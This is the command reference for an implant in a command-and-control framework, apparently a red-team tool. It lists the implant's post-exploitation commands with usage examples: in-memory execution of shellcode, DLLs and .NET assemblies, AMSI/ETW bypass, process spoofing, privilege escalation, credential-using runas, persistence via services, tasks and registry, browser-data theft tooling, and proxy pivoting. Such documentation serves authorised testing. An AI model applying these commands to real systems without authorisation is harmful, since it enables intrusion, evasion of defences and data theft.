Skip to content

Implant

implant

info

show session info

Description

Displays the specified session info. If no session ID is provided, shows info of the current active session.

Text Only
info [session]

Examples

Text Only
// Show current session info
info

// Show specific session info by ID prefix
info b1ab9056

init

init session

Text Only
init

keepalive

toggle duplex keepalive mode

Text Only
keepalive [enable/disable]

ping

get bind implant response

Text Only
ping

polling

polling task status

Text Only
polling [flags]

Options

Text Only
      --interval int   interval (default 1)

recover

recover session

Text Only
recover

sleep

change implant sleep config

Text Only
sleep [expression] [flags]

Options

Text Only
      --jitter float   jitter

suicide

kill implant

Text Only
suicide

switch

switch session

Description

Switch session to another server pipeline by pipeline id

Text Only
switch [flags]

Options

Text Only
  -p, --pipeline string   target pipeline id

wait

wait for task to finish

Text Only
wait

Examples

Wait task content.

Text Only
wait 59

cancel_task

Cancel a task by task_id

Text Only
cancel_task [task_id]

Examples

Text Only
cancel_task <task_id>

fetch_task

Fetch the details of a task

Text Only
fetch_task [flags]

Options

Text Only
  -f, --file            output to file
  -o, --output string   output file path

files

List all downloaded files.

Text Only
files

list_task

List all tasks

Text Only
list_task

Examples

Text Only
list_task

query_task

Query a task by task_id

Text Only
query_task [task_id]

Examples

Text Only
query_task <task_id>

tasks

List tasks

Description

List tasks

Text Only
tasks

Options

Text Only
  -a, --all   show all tasks

module

Module management

SEE ALSO

module clear

Clear all modules

Text Only
module clear

SEE ALSO

module list

List modules

Text Only
module list

SEE ALSO

module load

Load module

Text Only
module load [module_file] [flags]

Examples

load module from malefic-modules before loading, you can list the current modules:

Text Only
module list
then you can load module
Text Only
module load --path <module_file.dll>
you can see more modules loaded by module list
Text Only
execute_addon,clear,ps,powershell...

Options

Text Only
      --3rd string        build 3rd-party modules
      --artifact string   exist module artifact
      --bundle string     bundle name
      --modules string    modules list,eg: basic,extend
      --path string       module path

SEE ALSO

module refresh

Refresh module

Text Only
module refresh

SEE ALSO

module unload

Unload a module bundle by name

Text Only
module unload [bundle_name]

SEE ALSO

explorer

file explorer

Text Only
explorer

reg_explorer

Interactive registry explorer

Description

Explore registry keys and values interactively from a starting hive/path (e.g., HKEY_LOCAL_MACHINE\SOFTWARE).

Text Only
reg_explorer [hive\path]

Examples

Text Only
reg_explorer HKLM\SOFTWARE
reg_explorer HKEY_CURRENT_USER\Software

execute_addon

Execute the loaded addon

Text Only
execute_addon [flags]

Examples

Execute the addon without "-" arguments

Text Only
execute_addon httpx 1.1.1.1
execute the addon file with "-" arguments, you need add "--" before the arguments
Text Only
execute_addon gogo.exe -- -i 127.0.0.1 -p http
if you specify the addon name, you need to use the alias name
Text Only
execute_addon gogo -- -i 127.0.0.1 -p http

Options

Text Only
      --arch string      architecture x64,x86
  -a, --argue string     spoofing process arguments, eg: notepad.exe 
  -b, --block_dll        block not microsoft dll injection
      --delay uint32     delay before execution in milliseconds (default 1)
      --etw              disable ETW
  -p, --ppid uint32      spoofing parent processes, (0 means injection into ourselves)
  -n, --process string   custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet            disable output
  -t, --timeout uint32   timeout, in seconds (default 60)

list_addon

List all addons

Text Only
list_addon [addon]

load_addon

Load an addon

Description

Load an executable into the implant's memory for reuse

Text Only
load_addon [flags]

Examples

addon default name is filename, default module is selected based on the file extension

Text Only
load_addon gogo.exe
assigns an alias name gogo to the addon, and the specified module is execute_exe
Text Only
load_addon gogo.exe -n gogo -m execute_exe

Options

Text Only
  -m, --module string   module type
  -n, --name string     addon name

execute

bof

COFF Loader, executes Bof (Windows Only)

Description

refactor from https://github.com/hakaioffsec/coffee ,fix a bundle bugs

Arguments for the BOF can be passed after the -- delimiter. Each argument must be prefixed with the type of the argument followed by a colon (:). The following types are supported:

  • str - A null-terminated string
  • wstr - A wide null-terminated string
  • int - A signed 32-bit integer
  • short - A signed 16-bit integer
  • bin - A base64-encoded binary blob
Text Only
bof [bof] [flags]

Examples

Text Only
bof dir.x64.o -- wstr:"C:\\Windows\\System32"

Options

Text Only
  -f, --file string   save output to file path

dllspawn

DllSpawn the given DLL in the sacrifice process

Description

use a custom Headless PE loader to load DLL in the sacrificed process.

Text Only
dllspawn [dll] [flags]

Examples

Text Only
dllspawn example.dll

Options

Text Only
      --arch string         architecture x64,x86
  -a, --argue string        spoofing process arguments, eg: notepad.exe 
      --binPath string      custom process path
  -b, --block_dll           block not microsoft dll injection
      --delay uint32        delay before execution in milliseconds (default 1)
  -e, --entrypoint string   custom entrypoint
      --etw                 disable ETW
  -f, --file string         save output to file path
  -p, --ppid uint32         spoofing parent processes, (0 means injection into ourselves)
  -n, --process string      custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet               disable output
  -t, --timeout uint32      timeout, in seconds (default 60)

execute

Execute commands

Description

Exec local executable file, without output

Text Only
execute [cmdline] [flags]

Examples

Execute the executable file without any '-' arguments.

Text Only
execute whoami
execute the executable file with '-' arguments, you need add "--" before the arguments
Text Only
execute gogo.exe -- -i 127.0.0.1 -p http

Options

Text Only
  -f, --file string   save output to file path

execute_assembly

Loads and executes a .NET assembly in implant process (Windows Only)

Description

Load CLR assembly in sacrifice process (with donut)

Text Only
execute_assembly [file] [flags]

Examples

Text Only
execute_assembly potato.exe "whoami" 

Options

Text Only
      --amsi           bypass AMSI
  -a, --argue string   spoofing process arguments, eg: notepad.exe 
  -b, --block_dll      block not microsoft dll injection
      --bypass-all     bypass AMSI,ETW,WLDP
      --etw            disable ETW
  -f, --file string    save output to file path
  -p, --ppid uint32    spoofing parent processes, (0 means injection into ourselves)
      --wldp           bypass WLDP

execute_dll

Executes the given DLL in the sacrifice process

Description

use a custom Headless PE loader to load DLL in the sacrificed process.

Text Only
execute_dll [dll] [flags]

Examples

Text Only
execute_dll example.dll 

if entrypoint not default, you can specify the entrypoint

Text Only
execute_dll example.dll -e entrypoint -- arg1 arg2

Options

Text Only
      --arch string         architecture x64,x86
  -a, --argue string        spoofing process arguments, eg: notepad.exe 
      --binPath string      custom process path
  -b, --block_dll           block not microsoft dll injection
      --delay uint32        delay before execution in milliseconds (default 1)
  -e, --entrypoint string   custom entrypoint
      --etw                 disable ETW
  -f, --file string         save output to file path
  -p, --ppid uint32         spoofing parent processes, (0 means injection into ourselves)
  -n, --process string      custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet               disable output
  -t, --timeout uint32      timeout, in seconds (default 60)

execute_exe

Executes the given PE in the sacrifice process

Description

use a custom Headless PE loader to load EXE in the sacrificed process.

Text Only
execute_exe [exe] [flags]

Examples

Text Only
execute_exe gogo.exe -- -i 123.123.123.123 -p top2

Options

Text Only
      --arch string      architecture x64,x86
  -a, --argue string     spoofing process arguments, eg: notepad.exe 
  -b, --block_dll        block not microsoft dll injection
      --delay uint32     delay before execution in milliseconds (default 1)
      --etw              disable ETW
  -f, --file string      save output to file path
  -p, --ppid uint32      spoofing parent processes, (0 means injection into ourselves)
  -n, --process string   custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet            disable output
  -t, --timeout uint32   timeout, in seconds (default 60)

execute_local

Execute local PE on sacrifice process

Description

Execute local PE on sacrifice process, support spoofing process arguments, spoofing ppid, block-dll, disable etw

Text Only
execute_local [local_exe] [flags]

Examples

Text Only
execute_local local_exe --ppid 1234 --block_dll --etw --argue "argue"

Options

Text Only
  -a, --argue string     spoofing process arguments, eg: notepad.exe 
  -b, --block_dll        block not microsoft dll injection
      --etw              disable ETW
  -f, --file string      save output to file path
  -o, --output           disable output
  -p, --ppid uint32      spoofing parent processes, (0 means injection into ourselves)
  -n, --process string   custom process path

execute_shellcode

Executes the given shellcode in the sacrifice process

Description

The current shellcode injection method uses APC.

In the future, configurable shellcode injection settings will be provided, along with Donut, SGN, SRDI, etc.

Text Only
execute_shellcode [shellcode_file] [flags]

Examples

Text Only
execute_shellcode example.bin

Options

Text Only
      --arch string      architecture x64,x86
  -a, --argue string     spoofing process arguments, eg: notepad.exe 
  -b, --block_dll        block not microsoft dll injection
      --delay uint32     delay before execution in milliseconds (default 1)
      --etw              disable ETW
  -f, --file string      save output to file path
  -p, --ppid uint32      spoofing parent processes, (0 means injection into ourselves)
  -n, --process string   custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet            disable output
  -t, --timeout uint32   timeout, in seconds (default 60)

inline_assembly

Loads and inline execute a .NET assembly (Windows Only)

Description

Load CLR assembly in implant process(will not create new process)

if return 0x80004005, please use --amsi bypass.

Text Only
inline_assembly [file] [flags]

Examples

inline execute a .NET assembly

Text Only
inline_assembly --amsi potato.exe "whoami" 
Execute a .NET assembly with "-" arguments, you need add "--" before the arguments
Text Only
inline_assembly --amsi potato.exe -- cmd /c whoami

Options

Text Only
      --amsi          bypass AMSI
      --bypass-all    bypass AMSI,ETW,WLDP
      --etw           bypass ETW
  -f, --file string   save output to file path
      --wldp          bypass WLDP

inline_dll

Executes the given inline DLL in the current process

Description

use a custom Headless PE loader to load DLL in the current process.

Instability warning

inline execute dll may cause the implant to crash, please use with caution.

Text Only
inline_dll [dll] [flags]

Examples

execute an inline DLL with the default entry point

Text Only
inline_dll example.dll
specify the entrypoint
Text Only
inline_dll example.dll -e RunFunction -- arg1 arg2

Options

Text Only
      --arch string         architecture x64,x86
      --delay uint32        delay before execution in milliseconds (default 1)
  -e, --entrypoint string   entrypoint
  -f, --file string         save output to file path
  -n, --process string      custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet               disable output
  -t, --timeout uint32      timeout, in seconds (default 60)

inline_exe

Executes the given inline EXE in current process

Description

use a custom Headless PE loader to load EXE in the current process.

Instability warning

inline execute exe may cause the implant to crash, please use with caution.

if double run same exe, More likely to crash

Text Only
inline_exe [exe] [flags]

Examples

execute the inline PE file

Text Only
inline_exe hackbrowserdata.exe -- -h

Options

Text Only
      --arch string      architecture x64,x86
      --delay uint32     delay before execution in milliseconds (default 1)
  -f, --file string      save output to file path
  -n, --process string   custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet            disable output
  -t, --timeout uint32   timeout, in seconds (default 60)

inline_local

Execute inline PE on implant process

Description

Execute inline PE on implant process, support spoofing process arguments

Text Only
inline_local [local_exe] [flags]

Examples

Text Only
inline_local whoami

Options

Text Only
  -a, --argue string     spoofing process arguments, eg: notepad.exe 
  -b, --block_dll        block not microsoft dll injection
      --etw              disable ETW
  -f, --file string      save output to file path
  -o, --output           disable output
  -p, --ppid uint32      spoofing parent processes, (0 means injection into ourselves)
  -n, --process string   custom process path

inline_shellcode

Executes the given inline shellcode in the implant process

Description

The current shellcode injection method uses APC.

Instability warning

inline execute shellcode may cause the implant to crash, please use with caution.

Text Only
inline_shellcode [shellcode_file] [flags]

Examples

Text Only
inline_shellcode example.bin

Options

Text Only
      --arch string      architecture x64,x86
      --delay uint32     delay before execution in milliseconds (default 1)
  -f, --file string      save output to file path
  -n, --process string   custom process path (default "C:\\\\Windows\\\\System32\\\\svchost.exe")
  -q, --quiet            disable output
  -t, --timeout uint32   timeout, in seconds (default 60)

powerpick

unmanaged powershell on implant process (Windows Only)

Text Only
powerpick [args] [flags]

Examples

Text Only
powerpick -s powerview.ps1 -- Get-NetUser

Options

Text Only
      --amsi            bypass AMSI
      --bypass-all      bypass AMSI,ETW,WLDP
      --etw             bypass ETW
  -f, --file string     save output to file path
  -s, --script string   powershell script
      --wldp            bypass WLDP

powershell

Execute cmd with powershell

Description

equal: powershell.exe -ExecutionPolicy Bypass -w hidden -nop "[cmdline]"

Text Only
powershell [cmdline] [flags]

Examples

execute powershell command:

Text Only
powershell dir

Options

Text Only
  -f, --file string   save output to file path
  -q, --quiet         disable output

run

run commands

Description

Exec local executable file, return output

Text Only
run [cmdline] [flags]

Examples

Execute the executable file without any '-' arguments.

Text Only
run whoami
run the executable file with '-' arguments, you need add "--" before the arguments
Text Only
run gogo.exe -- -i 127.0.0.1 -p http

Options

Text Only
  -f, --file string   save output to file path

shell

Execute cmd

Description

equal: exec cmd /c "[cmdline]"

Text Only
shell [cmdline] [flags]

Options

Text Only
  -f, --file string    save output to file path
  -q, --quiet          disable output
  -r, --realtime       stream output in realtime (default true)
  -s, --shell string   custom shell path (e.g. /bin/bash, /bin/ash)

sys

bypass

Bypass AMSI and ETW

Text Only
bypass [flags]

Examples

Text Only
bypass --amsi --etw

Options

Text Only
      --amsi   Bypass AMSI
      --etw    Bypass ETW

env

List environment variables

Text Only
env

SEE ALSO

env set

Set environment variable

Text Only
env set [env-key] [env-value]

Examples

Text Only
    setenv key1 value1

SEE ALSO

  • env - List environment variables

env unset

Unset environment variable

Text Only
env unset [env-key]

Examples

Text Only
    unsetenv key1

SEE ALSO

  • env - List environment variables

kill

Kill the process by pid

Text Only
kill [pid]

Examples

kill the process which pid is 1234

Text Only
kill 1234

netstat

List network connections

Text Only
netstat

ps

List processes

Text Only
ps

sysinfo

Get basic sys info

Text Only
sysinfo

whoami

Print current user

Text Only
whoami

wmi_execute

Execute a WMI method

Description

Executes a specified method within a WMI class, allowing for more complex administrative actions via WMI.

Text Only
wmi_execute [flags]

Examples

Execute a WMI method:

Text Only
wmi_execute --namespace <namespace> --class_name <classname> --method_name <method_name> --params <key1>=<value1>,<key2>=<value2>
Execute a WMI method to create a new process:
Text Only
wmi_execute --namespace root\cimv2 --class_name Win32_Process --method_name Create --params CommandLine=notepad.exe

wmi_execute --namespace root\cimv2 --class_name Win32_Process --method_name Create --params "CommandLine=cmd /c calc"

Options

Text Only
      --class_name string    WMI class name
      --method_name string   WMI method name
      --namespace string     WMI namespace (e.g., root\cimv2)
      --params strings       Parameters for the WMI method

wmi_query

Perform a WMI query

Description

Executes a WMI query within the specified namespace to retrieve system information or perform administrative actions.

Text Only
wmi_query [flags]

Examples

Perform a WMI query in the root\cimv2 namespace:

Text Only
  wmi_query --namespace root\\cimv2 --args "SELECT * FROM Win32_Process"

Options

Text Only
      --args strings       Arguments for the WMI query
      --namespace string   WMI namespace (e.g., root\cimv2)

service

Perform service operations

Description

Manage services, including listing, creating, starting, stopping, and querying service status.

SEE ALSO

service create

Create a new service

Description

Create a new service with specified name, display name, executable path, start type, error control, and account name.

Control the start type and error control by providing appropriate values.

Text Only
service create [flags]

Examples

Create a new service named "example_service":

Text Only
  service create --name example_service --display "Example Service" --path /path/to/executable --start_type AutoStart --error Normal

Options

Text Only
      --account string      AccountName for service (LocalSystem, NetworkService; \<hostname\>\\\<username\> NT AUTHORITY\SYSTEM; .\username, ..) (default "LocalSystem")
      --display string      Display name of the service
      --error string        Error control level (Ignore, Normal, Severe, Critical) (default "Normal")
      --name string         Name of the service (required)
      --path string         Path to the executable (required)
      --start_type string   Service start type (BootStart, SystemStart, AutoStart, DemandStart, Disabled) (default "AutoStart")
      --wizard              Start interactive wizard mode

SEE ALSO

  • service - Perform service operations

service delete

Delete a specified service

Description

Delete a service by specifying its name, removing it from the system permanently.

Text Only
service delete [name]

Examples

Delete a service named "ExampleService":

Text Only
  service delete ExampleService

SEE ALSO

  • service - Perform service operations

service list

List all available services

Description

Retrieve and display a list of all services available on the system, including their configuration and current status.

Text Only
service list

Examples

List all services:

Text Only
  service list

SEE ALSO

  • service - Perform service operations

service query

Query the status of a service

Description

Retrieve the current status and configuration of a specified service.

Text Only
service query [service_name]

Examples

Query the status of a service named "example_service":

Text Only
  service query example_service

SEE ALSO

  • service - Perform service operations

service start

Start an existing service

Description

Start a service by specifying its name.

Text Only
service start [service_name]

Examples

Start a service named "example_service":

Text Only
  service start example_service

SEE ALSO

  • service - Perform service operations

service stop

Stop a running service

Description

Stop a service by specifying its name. This command will halt the service's operation.

Text Only
service stop [service_name]

Examples

Stop a service named "example_service":

Text Only
  service stop example_service

SEE ALSO

  • service - Perform service operations

reg

Perform registry operations

Description

Manage Windows registry entries, including querying, adding, deleting, listing keys, and listing values.

SEE ALSO

reg add

Add or modify a registry key

Description

Add or modify a registry key with specified values. Supported types: REG_SZ, REG_BINARY, REG_DWORD, REG_QWORD

Text Only
reg add [path] [flags]

Examples

Add or modify a registry key:

Text Only
  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Example -v TestValue -t REG_DWORD -d 1
  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Example -v TestString -t REG_SZ -d "Hello World"
  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Example -v TestBinary -t REG_BINARY -d 01020304

Options

Text Only
  -d, --data string    Data to set
  -t, --type string    Value type (REG_SZ, REG_BINARY, REG_DWORD, REG_QWORD) (default "REG_SZ")
  -v, --value string   Value name

SEE ALSO

  • reg - Perform registry operations

reg delete

Delete a registry key

Description

Remove a specific registry key.

Text Only
reg delete [path] [key]

Examples

Delete a registry key:

Text Only
  reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Example TestKey

SEE ALSO

  • reg - Perform registry operations

reg list_key

List subkeys in a registry path

Description

Retrieve a list of all subkeys under a specified registry path.

Text Only
reg list_key [path]

Examples

List subkeys in a registry path:

Text Only
  reg list_key HKEY_LOCAL_MACHINE\SOFTWARE\Example

SEE ALSO

  • reg - Perform registry operations

reg list_value

List values in a registry path

Description

Retrieve a list of all values under a specified registry path.

Text Only
reg list_value [path]

Examples

List values in a registry path:

Text Only
  reg list_value HKEY_LOCAL_MACHINE\SOFTWARE\Example

SEE ALSO

  • reg - Perform registry operations

reg query

Query a registry key

Description

Retrieve the value associated with a specific registry key.

Text Only
reg query [path] [key]

Examples

Query a registry key:

Text Only
  reg query HKEY_LOCAL_MACHINE\SOFTWARE\Example TestKey

SEE ALSO

  • reg - Perform registry operations

taskschd

Manage scheduled tasks

Description

Perform operations related to scheduled tasks, including listing, creating, starting, stopping, and deleting tasks.

SEE ALSO

taskschd create

Create a new scheduled task

Description

Create a new scheduled task with the specified name, executable path, trigger type, and start boundary.

Text Only
taskschd create [flags]

Examples

Create a scheduled task:

Text Only
  taskschd create --name ExampleTask --path /path/to/executable --trigger_type AtLogon --start_boundary "2023-10-10T09:00:00"

Options

Text Only
      --name string             Name of the scheduled task (required)
      --path string             Path to the executable for the scheduled task (required)
      --start_boundary string   Start boundary for the scheduled task (e.g., 2023-10-10T09:00:00)
      --task_folder string      Task Folder for the scheduled task (default "\\")
      --trigger_type string     Trigger type for the task (e.g. Daily,Weekly,monthly)
      --wizard                  Start interactive wizard mode

SEE ALSO

taskschd delete

Delete a scheduled task

Description

Delete a scheduled task by specifying its name.

Text Only
taskschd delete [name] [flags]

Examples

Delete a scheduled task:

Text Only
  taskschd delete ExampleTask

Options

Text Only
      --task_folder string   Task Folder for the scheduled task (default "\\")

SEE ALSO

taskschd list

List all scheduled tasks

Description

Retrieve a list of all scheduled tasks on the system.

Text Only
taskschd list

Examples

List all scheduled tasks:

Text Only
  taskschd list

SEE ALSO

taskschd query

Query the configuration of a scheduled task

Description

Retrieve the current configuration, status, and timing information of a specified scheduled task by name.

Text Only
taskschd query [name] [flags]

Examples

Query the configuration of a scheduled task:

Text Only
  taskschd query ExampleTask

Options

Text Only
      --task_folder string   Task Folder for the scheduled task (default "\\")

SEE ALSO

taskschd run

Run a scheduled task immediately

Description

Execute a scheduled task immediately by specifying its name.

Text Only
taskschd run [name] [flags]

Examples

Run a scheduled task immediately:

Text Only
  taskschd run ExampleTask

Options

Text Only
      --task_folder string   Task Folder for the scheduled task (default "\\")

SEE ALSO

taskschd start

Start a scheduled task

Description

Start a scheduled task by specifying its name.

Text Only
taskschd start [name] [flags]

Examples

Start a scheduled task:

Text Only
  taskschd start ExampleTask

Options

Text Only
      --task_folder string   Task Folder for the scheduled task (default "\\")

SEE ALSO

taskschd stop

Stop a running scheduled task

Description

Stop a scheduled task by specifying its name.

Text Only
taskschd stop [name] [flags]

Examples

Stop a scheduled task:

Text Only
  taskschd stop ExampleTask

Options

Text Only
      --task_folder string   Task Folder for the scheduled task (default "\\")

SEE ALSO

getsystem

Attempt to elevate privileges

Text Only
getsystem

Examples

Attempt to elevate privileges:

Text Only
  getsystem

privs

List available privileges

Text Only
privs

Examples

List available privileges:

Text Only
  privs

rev2self

Revert to the original token

Text Only
rev2self

Examples

Revert to the original token:

Text Only
  rev2self

runas

Run a program as another user

Text Only
runas --username [username] --domain [domain] --password [password] --path [path] --args [args] --use-profile --use-env --netonly [flags]

Examples

Run a program as a different user:

Text Only
  runas --username admin --domain EXAMPLE --password admin123 --path /path/to/program --args "arg1 arg2" --use-profile --use-env

Options

Text Only
      --args string       Arguments for the program
      --domain string     Domain of the user
      --netonly           Use network credentials only
      --password string   User password
      --path string       Path to the program to execute
      --use-env           Use user environment
      --use-profile       Load user profile
      --username string   Username to run as

request

Send HTTP request

Description

Send HTTP request to specified URL

Text Only
request [url] [flags]

Examples

Text Only
request http://example.com

request -X POST -d "data" http://example.com

request -H "Host: example.com" -H "User-Agent: custom" http://example.com

Options

Text Only
  -d, --body string          request body
  -H, --header stringArray   HTTP header (can be used multiple times)
  -X, --method string        HTTP method (default "GET")
  -t, --timeout int          request timeout in seconds (default 30)

file

download

Download file

Description

download file in implant

Text Only
download [implant_file] [flags]

Examples

Text Only
download ./file.txt

Options

Text Only
  -r, --dir   download dir

upload

Upload file

Description

upload local file to remote implant

Text Only
upload [local] [remote] [flags]

Examples

Text Only
upload ./file.txt /tmp/file.txt

Options

Text Only
      --hidden        hidden file
      --priv string   file privilege (default "0644")

cat

Print file content

Description

concatenate and display the contents of file in implant

Text Only
cat [implant_file]

Examples

Text Only
cat file.txt            

cd

Change directory

Description

change the shell's current working directory in implant

Text Only
cd

chmod

Change file mode

Description

change the permissions of files and directories in implant

Text Only
chmod [file] [mode]

Examples

Text Only
chmod ./file.txt 644

chown

Change file owner

Description

change the ownership of a file or directory in implant

Text Only
chown [file] [user] [flags]

Examples

Text Only
chown user ./file.txt 

Options

Text Only
  -g, --gid string   Group id
  -r, --recursive    recursive

cp

Copy file

Description

copy files and directories in implant

Text Only
cp [source] [target]

Examples

Text Only
cp /tmp/file.txt /tmp/file2.txt 

enum_drivers

Enum Drivers

Text Only
enum_drivers

Examples

Text Only
enum_drivers

ls

List directory

Description

list directory contents in implant

Text Only
ls [path]

Examples

Text Only
ls /tmp 

mkdir

Make directory

Description

make directories in implant

Text Only
mkdir [path]

Examples

Text Only
mkdir /tmp

mv

Move file

Description

move files and directories in implant

Text Only
mv [source] [target]

Examples

Text Only
mv /tmp/file.txt /tmp/file2.txt

pwd

Print working directory

Description

print working directory in implant

Text Only
pwd

rm

Remove file

Description

remove files and directories in implant

Text Only
rm [file]

Examples

Text Only
rm /tmp/file.txt

touch

Touch file

Description

create an empty file or update file timestamps in implant

Text Only
touch [path]

Examples

Text Only
touch /tmp/file.txt

pipe

Manage named pipes

Description

Perform operations related to named pipes, including uploading, reading, and closing pipes.

SEE ALSO

pipe read

Read data from a named pipe

Description

Read data from a specified named pipe.

Text Only
pipe read [pipe_name]

Examples

Read data from pipe:

Text Only
  pipe read \\.\pipe\test_pipe

SEE ALSO

  • pipe - Manage named pipes

pipe server

Manage pipe server operations

Description

Start, stop, or list pipe servers for receiving data from clients.

Text Only
pipe server [action] [pipe_name]

Examples

Pipe server operations:

Text Only
  pipe server start \\.\pipe\mypipe       # Start a pipe server
  pipe server stop \\.\pipe\mypipe       # Stop a pipe server
  pipe server list               # List all running pipe servers
  pipe server status \\.\pipe\mypipe      # Check server status and cache size
  pipe server clear \\.\pipe\mypipe       # Clear cached data for a pipe

SEE ALSO

  • pipe - Manage named pipes

pipe upload

Upload file to a named pipe

Description

Upload the content of a specified file to a named pipe.

Text Only
pipe upload [pipe_name] [file_path]

Examples

Upload file to pipe:

Text Only
  pipe upload \\.\pipe\test_pipe /path/to/file

SEE ALSO

  • pipe - Manage named pipes

pivot

portfwd

Forward local port to remote target

Description

Forward local port to remote target through the implant

Text Only
portfwd [pipeline] [flags]

Examples

Forward local port to remote target:

Text Only
portfwd rem_default --port 8080 --target 192.168.1.1:80

Options

Text Only
  -p, --port string     Local port to listen on
  -t, --target string   Remote target address (host:port)

portfwd_local

Forward local port to remote target

Text Only
portfwd_local [pipeline] [agent] [flags]

Options

Text Only
  -l, --local string   Local address to connect to (host:port)
  -p, --port string    Local port to listen on

proxy

Create a proxy through the implant

Description

Create a proxy server through the implant with optional authentication

Text Only
proxy [pipeline] [flags]

Examples

Create a proxy server:

Text Only
proxy rem_default --port 8080

Options

Text Only
      --password string   Password for authentication (default "maliceofinternal")
  -p, --port string       Local port to listen on
      --protocol string   Inbound protocol (default "socks5")
  -u, --username string   Username for authentication (default "maliceofinternal")

rem_dial

Run rem on the implant

Text Only
rem_dial [pipeline] [args]

reverse

Reverse port forward from remote to local

Description

Create a reverse port forward from remote target to local through the implant

Text Only
reverse [pipeline] [flags]

Examples

Create reverse port forward:

Text Only
reverse rem_default --port 12345

Options

Text Only
      --password string   Password for authentication (default "maliceofinternal")
  -p, --port string       Local port to listen on
      --protocol string   Inbound protocol (default "socks5")
  -u, --username string   Username for authentication (default "maliceofinternal")

rportfwd

Remote port forward through the implant

Description

Create a remote port forward through the implant to connect back to a local port

Text Only
rportfwd [pipeline] [flags]

Examples

Create remote port forward:

Text Only
rportfwd rem_default --port 8080 --remote 192.168.1.1:80

Options

Text Only
  -p, --port string     Local port to listen on
  -r, --remote string   implant's address to connect to (host:port)

rportfwd_local

Remote port forward through the implant to client

Text Only
rportfwd_local [pipeline] [agent] [flags]

Options

Text Only
  -p, --port string     Local port to listen on
  -r, --remote string   implant's internal address to connect to (host:port)